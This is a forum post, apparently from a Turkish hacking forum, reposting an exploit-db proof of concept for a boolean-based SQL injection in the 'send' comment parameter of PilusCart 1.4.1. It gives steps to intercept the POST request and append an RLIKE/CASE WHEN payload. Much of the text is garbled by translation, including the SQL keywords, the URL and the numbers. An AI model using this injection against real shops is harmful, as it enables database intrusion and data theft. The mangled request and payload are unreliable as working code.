PilusCart 1.4.1 - SQL Vuln.
by storix - 05-30-2019, 10:40 PM
#1
####################################################################

# Başlık Exploit: PilusCart 1.4.1 - 'send' SQL güvenlik açığı
# Dork N / A
# Tarih: 2019/10/02
# Exploit Author: Kybre
# Satıcı Web Sitesi: https://sourceforge.net/projects/pilus/
# Yazılım Bağlantı: https://sourceforge.net/projects/pilus/
# Sürüm: 1.4.1
# Kategori: webapps
# Üzerinde test: Wampp @Win
# CVE N / A
# Yazılım Descr * iption: PilusCart PHP ekr yazılı, web tabanlı online mağaza yönetim sistemidir * en popüler web programlama dili bugün olduğu gibi ipting dili. veri depolamak için PilusCart MySQL ilişkisel veritabanı yönetim sistemi kullanır.

####################################################################

# Güvenlik açıkları / Darbe
# Pilus 1.4.1 versiyonu olarak adlandırılan bu web uygulaması.
// localhost / pilusun / okuma apa-itu-pdo: http # Anahtarı
Ben linkte verdik kırmızı renkli parçalar doldurunuz
https://i.hizliresim.com/MV11La.jpg
geğirmek paketi ile gir. ve yükü ekleme
Saldırı desenine isteği sonunda.

####################################################################

# POC - SQL (Boolean Tabanlı String)
# Parametreler: göndermek
# Saldırı Desen: RLIKE (vaka olduğunda 7488715 = 7488715 ardından
0x656d69726f676c75 başka 0x28 sonu)
# POST İsteği:
http: // localhost / Pilus / salt o-pdo ne-ne-pdo Post_id = 3 post_slug = nama_komentar = 4866630 situs_web = = 4551404 belirteci = 473ec0c6bda264fefb8447c8ff01956248ea477c isi_komentar = EMIROGLU2823174 göndermek = Gönder 9391510 kaptan?
RLIKE
(Olgu zaman sonra 7.488.715 = 7.488.715 0x656d69726f676c75 başka 0x28 sonu)
# exploit-db.com : https://www.exploit-db.com/exploits/46368
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Newsbull Haber Script XSS Vuln. Adient 0 146 05-30-2019, 10:55 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 103 05-30-2019, 10:54 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 82 05-30-2019, 10:52 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)